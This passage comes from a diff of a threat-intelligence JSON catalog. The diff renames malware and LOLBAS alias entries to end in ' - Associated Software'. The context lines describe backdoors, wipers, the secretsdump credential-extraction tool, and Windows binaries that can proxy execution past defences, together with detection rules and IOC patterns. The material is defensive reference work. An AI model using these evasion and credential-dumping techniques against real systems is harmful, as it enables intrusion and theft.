[lateral_movement_cmd_service.toml](https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml)\n* IOC: Unexpected service creation\n* IOC: Unexpected service modification[[Sc.exe - LOLBAS Project](/references/5ce3ef73-f789-4939-a60e-e0a373048bda)]", @@ -26993,7 +26993,7 @@ } ], "uuid": "8e0f3e81-6583-40f4-824c-2f5ba6b7e19d", - "value": "schtasks.exe" + "value": "schtasks.exe - Associated Software" }, { "description": "[schtasks](https://app.tidalcyber.com/software/2aacbf3a-a359-41d2-9a71-76447f0545b5) is used to schedule execution of programs or scripts on a Windows system to run at a specific date and time. [[TechNet Schtasks](https://app.tidalcyber.com/references/17c03e27-222d-41b5-9fa2-34f0939e5371)]", @@ -27081,7 +27081,7 @@ } ], "uuid": "371af2c7-299d-48e3-ace1-a3e33ba2fedd", - "value": "Scriptrunner.exe" + "value": "Scriptrunner.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Execute binary through proxy binary to evade defensive counter measures\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Windows\\System32\\scriptrunner.exe\n* C:\\Windows\\SysWOW64\\scriptrunner.exe\n\n**Resources:**\n* [https://twitter.com/KyleHanslovan/status/914800377580503040](https://twitter.com/KyleHanslovan/status/914800377580503040)\n* [https://twitter.com/NickTyrer/status/914234924655312896](https://twitter.com/NickTyrer/status/914234924655312896)\n* [https://github.com/MoooKitty/Code-Execution](https://github.com/MoooKitty/Code-Execution)\n\n**Detection:**\n* Sigma: [proc_creation_win_servu_susp_child_process.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_servu_susp_child_process.yml)\n* IOC: Scriptrunner.exe should not be in use unless App-v is deployed[[Scriptrunner.exe - LOLBAS Project](/references/805d16cc-8bd0-4f80-b0ac-c5b5df51427c)]", @@ -27123,7 +27123,7 @@ } ], "uuid": "922a431d-1ebd-4ad2-a16d-054e3eb24a1f", - "value": "Scrobj.dll" + "value": "Scrobj.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Script Component Runtime\n\n**Author:** Eral4m\n\n**Paths:**\n* c:\\windows\\system32\\scrobj.dll\n* c:\\windows\\syswow64\\scrobj.dll\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1479106975967240209](https://twitter.com/eral4m/status/1479106975967240209)\n\n**Detection:**\n* IOC: Execution of rundll32.exe with 'GenerateTypeLib' and a protocol handler ('://') on the command line[[Scrobj.dll - LOLBAS Project](/references/c50ff71f-c742-4d63-a18e-e1ce41d55193)]", @@ -27231,7 +27231,7 @@ } ], "uuid": "a2b8e082-e238-4bcc-89e0-f6fe424c1d89", - "value": "SeaDaddy" + "value": "SeaDaddy - Associated Software" }, { "description": "", @@ -27245,7 +27245,7 @@ } ], "uuid": "be5732aa-a2d1-4088-89af-caf36034f360", - "value": "SeaDesk" + "value": "SeaDesk - Associated Software" }, { "description": "[SeaDuke](https://app.tidalcyber.com/software/ae30d58e-21c5-41a4-9ebb-081dc1f26863) is malware that was used by [APT29](https://app.tidalcyber.com/groups/4c3e48b9-4426-4271-a7af-c3dfad79f447) from 2014 to 2015. It was used primarily as a secondary backdoor for victims that were already compromised with [CozyCar](https://app.tidalcyber.com/software/c2353daa-fd4c-44e1-8013-55400439965a). [[F-Secure The Dukes](https://app.tidalcyber.com/references/cc0dc623-ceb5-4ac6-bfbb-4f8514d45a27)]", @@ -27382,7 +27382,7 @@ } ], "uuid": "8e8fdcd6-5b2f-4672-91fe-740555345883", - "value": "secretsdump.py" + "value": "secretsdump.py - Associated Software" }, { "description": "According to joint Cybersecurity Advisory AA23-319A (November 2023), secretsdump is a Python script \"used to extract credentials and other confidential information from a system\".[[U.S. CISA Rhysida Ransomware November 15 2023](/references/6d902955-d9a9-4ec1-8dd4-264f7594605e)] Secretsdump is publicly available and included as a module of Impacket, a tool for working with network protocols.[[GitHub secretsdump](/references/c29a90a7-016f-49b7-a970-334290964f19)]", @@ -27493,7 +27493,7 @@ } ], "uuid": "87bd69bf-cada-4225-a91e-a32add673522", - "value": "Setres.exe" + "value": "Setres.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Configures display settings\n\n**Author:** Grzegorz Tworek\n\n**Paths:**\n* c:\\windows\\system32\\setres.exe\n\n**Resources:**\n* [https://twitter.com/0gtweet/status/1583356502340870144](https://twitter.com/0gtweet/status/1583356502340870144)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_setres.yml](https://github.com/SigmaHQ/sigma/blob/19396788dbedc57249a46efed2bb1927abc376d4/rules/windows/process_creation/proc_creation_win_lolbin_setres.yml)\n* IOC: Unusual location for choice.exe file\n* IOC: Process created from choice.com binary\n* IOC: Existence of choice.cmd file[[Setres.exe - LOLBAS Project](/references/631de0bd-d536-4183-bc5a-25af83bd795a)]", @@ -27536,7 +27536,7 @@ } ], "uuid": "ff7ceff1-6f98-4a50-9461-368b16d96b4b", - "value": "SettingSyncHost.exe" + "value": "SettingSyncHost.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Host Process for Setting Synchronization\n\n**Author:** Elliot Killick\n\n**Paths:**\n* C:\\Windows\\System32\\SettingSyncHost.exe\n* C:\\Windows\\SysWOW64\\SettingSyncHost.exe\n\n**Resources:**\n* [https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/](https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_settingsynchost.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_settingsynchost.yml)\n* IOC: SettingSyncHost.exe should not be run on a normal workstation[[SettingSyncHost.exe - LOLBAS Project](/references/57f573f2-1c9b-4037-8f4d-9ae65d13af94)]", @@ -27579,7 +27579,7 @@ } ], "uuid": "ff4e0a76-a50f-4605-9e19-2cb2309bbda7", - "value": "Setupapi.dll" + "value": "Setupapi.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Setup Application Programming Interface\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\setupapi.dll\n* c:\\windows\\syswow64\\setupapi.dll\n\n**Resources:**\n* [https://github.com/huntresslabs/evading-autoruns](https://github.com/huntresslabs/evading-autoruns)\n* [https://twitter.com/pabraeken/status/994742106852941825](https://twitter.com/pabraeken/status/994742106852941825)\n* [https://windows10dll.nirsoft.net/setupapi_dll.html](https://windows10dll.nirsoft.net/setupapi_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_setupapi_installhinfsection.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_rundll32_setupapi_installhinfsection.yml)\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [detect_rundll32_application_control_bypass___setupapi.yml](https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_rundll32_application_control_bypass___setupapi.yml)[[Setupapi.dll - LOLBAS Project](/references/1a8a1434-fc4a-4c3e-9a9b-fb91692d7efd)]", @@ -27620,7 +27620,7 @@ } ], "uuid": "86e74984-d06d-4b3e-be56-8c3af2060e99", - "value": "POISONPLUG.SHADOW" + "value": "POISONPLUG.SHADOW - Associated Software" }, { "description": "[ShadowPad](https://app.tidalcyber.com/software/5190f50d-7e54-410a-9961-79ab751ddbab) is a modular backdoor that was first identified in a supply chain compromise of the NetSarang software in mid-July 2017. The malware was originally thought to be exclusively used by [APT41](https://app.tidalcyber.com/groups/502223ee-8947-42f8-a532-a3b3da12b7d9), but has since been observed to be used by various Chinese threat activity groups. [[Recorded Future RedEcho Feb 2021](https://app.tidalcyber.com/references/6da7eb8a-aab4-41ea-a0b7-5313d88cbe91)][[Securelist ShadowPad Aug 2017](https://app.tidalcyber.com/references/862877d7-e18c-4613-bdad-0700bf3d45ae)][[Kaspersky ShadowPad Aug 2017](https://app.tidalcyber.com/references/95c9a28d-6056-4f87-9a46-9491318889e2)] ", @@ -27682,7 +27682,7 @@ } ], "uuid": "a834945d-2e57-44e0-9795-8bdc73208f61", - "value": "Disttrack" + "value": "Disttrack - Associated Software" }, { "description": "[Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) is wiper malware that was first used by an Iranian group known as the \"Cutting Sword of Justice\" in 2012. Other versions known as Shamoon 2 and Shamoon 3 were observed in 2016 and 2018. [Shamoon](https://app.tidalcyber.com/software/840db1db-e262-4d6f-b6e3-2a64696a41c5) has also been seen leveraging [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) and Filerase to carry out data wiping tasks. The term Shamoon is sometimes used to refer to the group using the malware as well as the malware itself.[[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)][[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)][[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)]", @@ -27910,7 +27910,7 @@ } ], "uuid": "8a0c4826-3d7a-4eac-9f53-1a82316ea81f", - "value": "Shdocvw.dll" + "value": "Shdocvw.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Shell Doc Object and Control Library.\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\shdocvw.dll\n* c:\\windows\\syswow64\\shdocvw.dll\n\n**Resources:**\n* [http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/](http://www.hexacorn.com/blog/2018/03/15/running-programs-via-proxy-jumping-on-a-edr-bypass-trampoline-part-5/)\n* [https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/](https://bohops.com/2018/03/17/abusing-exported-functions-and-exposed-dcom-interfaces-for-pass-thru-command-execution-and-lateral-movement/)\n* [https://twitter.com/bohops/status/997690405092290561](https://twitter.com/bohops/status/997690405092290561)\n* [https://windows10dll.nirsoft.net/shdocvw_dll.html](https://windows10dll.nirsoft.net/shdocvw_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)[[Shdocvw.dll - LOLBAS Project](/references/0739d5fe-b460-4ed4-be75-cff422643a32)]", @@ -27953,7 +27953,7 @@ } ], "uuid": "d60406be-9e87-4325-b130-ca74a8e3cb6f", - "value": "Shell32.dll" + "value": "Shell32.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Windows Shell Common Dll\n\n**Author:** LOLBAS Team\n\n**Paths:**\n* c:\\windows\\system32\\shell32.dll\n* c:\\windows\\syswow64\\shell32.dll\n\n**Resources:**\n* [https://twitter.com/Hexacorn/status/885258886428725250](https://twitter.com/Hexacorn/status/885258886428725250)\n* [https://twitter.com/pabraeken/status/991768766898941953](https://twitter.com/pabraeken/status/991768766898941953)\n* [https://twitter.com/mattifestation/status/776574940128485376](https://twitter.com/mattifestation/status/776574940128485376)\n* [https://twitter.com/KyleHanslovan/status/905189665120149506](https://twitter.com/KyleHanslovan/status/905189665120149506)\n* [https://windows10dll.nirsoft.net/shell32_dll.html](https://windows10dll.nirsoft.net/shell32_dll.html)\n\n**Detection:**\n* Sigma: [proc_creation_win_rundll32_susp_activity.yml](https://github.com/SigmaHQ/sigma/blob/62d4fd26b05f4d81973e7c8e80d7c1a0c6a29d0e/rules/windows/process_creation/proc_creation_win_rundll32_susp_activity.yml)\n* Splunk: [rundll32_control_rundll_hunt.yml](https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/rundll32_control_rundll_hunt.yml)[[Shell32.dll - LOLBAS Project](/references/9465358f-e0cc-41f0-a7f9-01d5faca8157)]", @@ -27996,7 +27996,7 @@ } ], "uuid": "03cadf3b-6313-4f0f-8ff1-b9944d6f86f2", - "value": "Shimgvw.dll" + "value": "Shimgvw.dll - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Photo Gallery Viewer\n\n**Author:** Eral4m\n\n**Paths:**\n* c:\\windows\\system32\\shimgvw.dll\n* c:\\windows\\syswow64\\shimgvw.dll\n\n**Resources:**\n* [https://twitter.com/eral4m/status/1479080793003671557](https://twitter.com/eral4m/status/1479080793003671557)\n\n**Detection:**\n* IOC: Execution of rundll32.exe with 'ImageView_Fullscreen' and a protocol handler ('://') on the command line[[Shimgvw.dll - LOLBAS Project](/references/aba1cc57-ac30-400f-8b02-db7bf279dfb6)]", @@ -28108,7 +28108,7 @@ } ], "uuid": "1632745f-2d2f-4720-8ce4-53750459cb33", - "value": "Backdoor.APT.CookieCutter" + "value": "Backdoor.APT.CookieCutter - Associated Software" }, { "description": "[[FireEye Clandestine Fox Part 2](https://app.tidalcyber.com/references/82500741-984d-4039-8f53-b303845c2849)]", @@ -28122,7 +28122,7 @@ } ], "uuid": "9e091930-0bc1-48d3-b49a-046d0ef9819c", - "value": "Pirpi" + "value": "Pirpi - Associated Software" }, { "description": "[SHOTPUT](https://app.tidalcyber.com/software/49351818-579e-4298-9137-03b3dc699e22) is a custom backdoor used by [APT3](https://app.tidalcyber.com/groups/9da726e6-af02-49b8-8ebe-7ea4235513c9). [[FireEye Clandestine Wolf](https://app.tidalcyber.com/references/dbb779c4-4d75-4fb4-ad3a-7d1f0f74e26f)]", @@ -28365,7 +28365,7 @@ } ], "uuid": "1defcdcc-c10d-40a8-afb2-5ebc68c4f752", - "value": "JackOfHearts" + "value": "JackOfHearts - Associated Software" }, { "description": "Kaspersky Labs assesses [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is an older variant of a malware family it refers to as the QueenOfClubs.[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)]", @@ -28379,7 +28379,7 @@ } ], "uuid": "dba41372-a48f-412e-ad89-3acdfba47cd0", - "value": "QueenOfClubs" + "value": "QueenOfClubs - Associated Software" }, { "description": "[SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is a remote access Trojan written in C++ that has been used by an unidentified \"sophisticated cyber actor\" since at least January 2017.[[CISA MAR SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/57c3256c-0d24-4647-9037-fefe1c88ad61)][[Costin Raiu IAmTheKing October 2020](https://app.tidalcyber.com/references/2be88843-ed3a-460e-87c1-85aa50e827c8)] It has been used to target government organizations, defense contractors, universities, and energy companies in Russia, India, Kazakhstan, Kyrgyzstan, Malaysia, Ukraine, and Eastern Europe.[[USCYBERCOM SLOTHFULMEDIA October 2020](https://app.tidalcyber.com/references/600de668-f128-4368-8667-24ed9a9db47a)][[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)] \n\nIn October 2020, Kaspersky Labs assessed [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) is part of an activity cluster it refers to as \"IAmTheKing\".[[Kaspersky IAmTheKing October 2020](https://app.tidalcyber.com/references/fe4050f3-1a73-4e98-9bf1-e8fb73a23b7a)] ESET also noted code similarity between [SLOTHFULMEDIA](https://app.tidalcyber.com/software/563c6534-497e-4d65-828c-420d5bb2041a) and droppers used by a group it refers to as \"PowerPool\".[[ESET PowerPool Code October 2020](https://app.tidalcyber.com/references/d583b409-35bd-45ea-8f2a-c0d566a6865b)] ", @@ -28447,7 +28447,7 @@ } ], "uuid": "b4f0c7bd-888f-4b77-a269-0f85b9bd7bb0", - "value": "GRAMDOOR" + "value": "GRAMDOOR - Associated Software" }, { "description": "[Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948) is a Telegram Bot API-based Python backdoor that has been distributed using a Nullsoft Scriptable Install System (NSIS) Installer; it has been used by [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6) since at least January 2022.[[DHS CISA AA22-055A MuddyWater February 2022](https://app.tidalcyber.com/references/e76570e1-43ab-4819-80bc-895ede67a205)][[NCSC GCHQ Small Sieve Jan 2022](https://app.tidalcyber.com/references/0edb8946-be38-45f5-a27c-bdbebc383d72)]\n\nSecurity researchers have also noted [Small Sieve](https://app.tidalcyber.com/software/c58028b9-2e79-4bc9-9b04-d24ea4dd4948)'s use by UNC3313, which may be associated with [MuddyWater](https://app.tidalcyber.com/groups/dcb260d8-9d53-404f-9ff5-dbee2c6effe6).[[Mandiant UNC3313 Feb 2022](https://app.tidalcyber.com/references/ac1a1262-1254-4ab2-a940-2d08b6558e9e)]", @@ -28517,7 +28517,7 @@ } ], "uuid": "e85ca2c7-0bfc-4a70-b696-a7ccf0867ac0", - "value": "Dofoil" + "value": "Dofoil - Associated Software" }, { "description": "[Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) is a malicious bot application that can be used to load other malware.\n[Smoke Loader](https://app.tidalcyber.com/software/2244253f-a4ad-4ea9-a4bf-fa2f4d895853) has been seen in the wild since at least 2011 and has included a number of different payloads. It is notorious for its use of deception and self-protection. It also comes with several plug-ins. [[Malwarebytes SmokeLoader 2016](https://app.tidalcyber.com/references/b619e338-16aa-478c-b227-b22f78d572a3)] [[Microsoft Dofoil 2018](https://app.tidalcyber.com/references/85069317-2c25-448b-9ff4-504e429dc1bf)]", @@ -28630,7 +28630,7 @@ } ], "uuid": "c1e3a23a-0680-4742-80ba-ae402c94ce02", - "value": "DARKTOWN" + "value": "DARKTOWN - Associated Software" }, { "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -28644,7 +28644,7 @@ } ], "uuid": "59a29c95-59db-4106-aef4-704fcb723be6", - "value": "DelfsCake" + "value": "DelfsCake - Associated Software" }, { "description": "[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -28658,7 +28658,7 @@ } ], "uuid": "d5ae171f-4dcc-43b5-929f-eaa010c6721a", - "value": "dfls" + "value": "dfls - Associated Software" }, { "description": "[SodaMaster](https://app.tidalcyber.com/software/6ecd970c-427b-4421-a831-69f46047d22a) is a fileless malware used by [menuPass](https://app.tidalcyber.com/groups/fb93231d-2ae4-45da-9dea-4c372a11f322) to download and execute payloads since at least 2020.[[Securelist APT10 March 2021](https://app.tidalcyber.com/references/90450a1e-59c3-491f-b842-2cf81023fc9e)]", @@ -28961,7 +28961,7 @@ } ], "uuid": "04aa2e49-be3f-4fbe-970f-a79c8a1f0463", - "value": "Splashtop Streamer" + "value": "Splashtop Streamer - Associated Software" }, { "description": "Splashtop is a tool used to enable remote connections to network devices for support and administration.[[U.S. CISA Understanding LockBit June 2023](/references/9c03b801-2ebe-4c7b-aa29-1b7a3625964a)]", @@ -29057,7 +29057,7 @@ } ], "uuid": "1931b352-fd83-4da0-ad18-747ffdd69f67", - "value": "Sqldumper.exe" + "value": "Sqldumper.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Debugging utility included with Microsoft SQL.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program Files\\Microsoft SQL Server\\90\\Shared\\SQLDumper.exe\n* C:\\Program Files (x86)\\Microsoft Office\\root\\vfs\\ProgramFilesX86\\Microsoft Analysis\\AS OLEDB\\140\\SQLDumper.exe\n\n**Resources:**\n* [https://twitter.com/countuponsec/status/910969424215232518](https://twitter.com/countuponsec/status/910969424215232518)\n* [https://twitter.com/countuponsec/status/910977826853068800](https://twitter.com/countuponsec/status/910977826853068800)\n* [https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se](https://support.microsoft.com/en-us/help/917825/how-to-use-the-sqldumper-exe-utility-to-generate-a-dump-file-in-sql-se)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_susp_sqldumper_activity.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml)\n* Elastic: [credential_access_lsass_memdump_file_created.toml](https://github.com/elastic/detection-rules/blob/f6421d8c534f295518a2c945f530e8afc4c8ad1b/rules/windows/credential_access_lsass_memdump_file_created.toml)\n* Elastic: [credential_access_cmdline_dump_tool.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml)[[Sqldumper.exe - LOLBAS Project](/references/793d6262-37af-46e1-a6b5-a5262f4a749d)]", @@ -29122,7 +29122,7 @@ } ], "uuid": "152e2ba8-bf02-42f4-abad-3205d6e8e4aa", - "value": "Sqlps.exe" + "value": "Sqlps.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool included with Microsoft SQL Server that loads SQL Server cmdlets. Microsoft SQL Server\\100 and 110 are Powershell v2. Microsoft SQL Server\\120 and 130 are Powershell version 4. Replaced by SQLToolsPS.exe in SQL Server 2016, but will be included with installation for compatability reasons.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program files (x86)\\Microsoft SQL Server\\100\\Tools\\Binn\\sqlps.exe\n* C:\\Program files (x86)\\Microsoft SQL Server\\110\\Tools\\Binn\\sqlps.exe\n* C:\\Program files (x86)\\Microsoft SQL Server\\120\\Tools\\Binn\\sqlps.exe\n* C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe\n* C:\\Program Files (x86)\\Microsoft SQL Server\\150\\Tools\\Binn\\SQLPS.exe\n\n**Resources:**\n* [https://twitter.com/ManuelBerrueta/status/1527289261350760455](https://twitter.com/ManuelBerrueta/status/1527289261350760455)\n* [https://twitter.com/bryon_/status/975835709587075072](https://twitter.com/bryon_/status/975835709587075072)\n* [https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017](https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017)\n\n**Detection:**\n* Sigma: [proc_creation_win_mssql_sqlps_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml)\n* Sigma: [image_load_dll_system_management_automation_susp_load.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/image_load/image_load_dll_system_management_automation_susp_load.yml)\n* Elastic: [execution_suspicious_powershell_imgload.toml](https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/execution_suspicious_powershell_imgload.toml)\n* Splunk: [2021-10-05-suspicious_copy_on_system32.md](https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md)[[Sqlps.exe - LOLBAS Project](/references/31cc851a-c536-4cef-9391-d3c7d3eab64f)]", @@ -29190,7 +29190,7 @@ } ], "uuid": "3c46936b-f9c4-4a3a-bea7-ca48f4a0660b", - "value": "SQLToolsPS.exe" + "value": "SQLToolsPS.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Tool included with Microsoft SQL that loads SQL Server cmdlts. A replacement for sqlps.exe. Successor to sqlps.exe in SQL Server 2016+.\n\n**Author:** Oddvar Moe\n\n**Paths:**\n* C:\\Program files (x86)\\Microsoft SQL Server\\130\\Tools\\Binn\\sqlps.exe\n\n**Resources:**\n* [https://twitter.com/pabraeken/status/993298228840992768](https://twitter.com/pabraeken/status/993298228840992768)\n* [https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017](https://docs.microsoft.com/en-us/sql/powershell/sql-server-powershell?view=sql-server-2017)\n\n**Detection:**\n* Sigma: [proc_creation_win_mssql_sqltoolsps_susp_execution.yml](https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml)\n* Splunk: [2021-10-05-suspicious_copy_on_system32.md](https://github.com/splunk/security_content/blob/aa9f7e0d13a61626c69367290ed1b7b71d1281fd/docs/_posts/2021-10-05-suspicious_copy_on_system32.md)[[SQLToolsPS.exe - LOLBAS Project](/references/612c9569-80af-48d2-a853-0f6e3f55aa50)]", @@ -29233,7 +29233,7 @@ } ], "uuid": "6a3de9d5-16e9-4467-b916-d4adeff389e1", - "value": "Squirrel.exe" + "value": "Squirrel.exe - Associated Software" }, { "description": "This object contains information sourced from the [Living Off The Land Binaries, Scripts and Libraries (LOLBAS)](https://github.com/LOLBAS-Project/LOLBAS) project, which is licensed under [GNU General Public License v3.0](https://github.com/LOLBAS-Project/LOLBAS/blob/master/LICENSE).\n\n**Description:** Binary to update the existing installed Nuget/squirrel package. Part of Microsoft Teams installation.\n\n**Author:** Reegun J (OCBC Bank) - @reegun21\n\n**Paths:**\n* %localappdata%\\Microsoft\\Teams\\current\\Squirrel.exe\n\n**Resources:**\n* [https://www.youtube.com/watch?v=rOP3hnkj7ls](https://www.youtube.com/watch?v=rOP3hnkj7ls)\n* [https://twitter.com/reegun21/status/1144182772623269889](https://twitter.com/reegun21/status/1144182772623269889)\n* [http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/](http://www.hexacorn.com/blog/2018/08/16/squirrel-as-a-lolbin/)\n* [https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12](https://medium.com/@reegun/nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-80c9df51cf12)\n* [https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56](https://medium.com/@reegun/update-nuget-squirrel-uncontrolled-endpoints-leads-to-arbitrary-code-execution-b55295144b56)\n\n**Detection:**\n* Sigma: [proc_creation_win_lolbin_squirrel.yml](https://github.com/SigmaHQ/sigma/blob/c04bef2fbbe8beff6c7620d5d7ea6872dbe7acba/rules/windows/process_creation/proc_creation_win_lolbin_squirrel.yml)[[Squirrel.exe - LOLBAS Project](/references/952b5ca5-1251-4e27-bd30-5d55d7d2da5e)]", @@ -29299,7 +29299,7 @@ } ], "uuid": "fa490d4d-26e4-4bb5-97b0-7bf89a8a99ed", - "value": 